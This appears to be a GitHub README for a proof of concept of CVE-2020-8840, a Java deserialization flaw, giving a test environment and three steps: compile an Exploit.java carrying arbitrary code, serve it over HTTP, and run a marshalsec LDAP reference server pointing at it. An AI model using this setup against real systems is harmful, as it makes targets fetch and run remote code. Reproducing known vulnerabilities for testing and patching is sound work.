Skip to content

Latest commit

 

History

History
14 lines (12 loc) · 408 Bytes

README.MD

File metadata and controls

14 lines (12 loc) · 408 Bytes

CVE-2020-8840

Environment

jdk 8u161
windows10 1903

Procedure

1.Create a java file named Exploit.java with code you wanna run in it & compile it
2.Create a http server using python or other tools at the same dir of class file
3.Create a ldap server using marshalsec: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit